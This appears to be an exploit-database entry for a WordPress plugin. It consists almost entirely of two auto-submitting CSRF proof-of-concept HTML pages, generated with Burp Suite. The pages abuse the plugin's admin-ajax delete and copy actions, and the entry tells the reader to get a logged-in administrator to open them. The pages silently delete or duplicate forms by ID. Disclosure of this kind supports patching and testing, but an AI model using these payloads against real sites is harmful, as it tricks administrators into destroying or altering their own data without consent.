Share
## https://sploitus.com/exploit?id=WPEX-ID:0A615CE3-93DA-459D-A33F-A2A6E74A2F94
Make a logged in admin open an HTML page with the form below 

Deletion (This will delete the form with ID 1)
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8081/wordpress/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="af2_fnsf_delete_posts" />
      <input type="hidden" name="post_ids[]" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Duplication (This will duplicate the form with ID 2)
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://example.com/wordpress/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="af2_fnsf_copy_posts" />
      <input type="hidden" name="post_ids[]" value="2" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>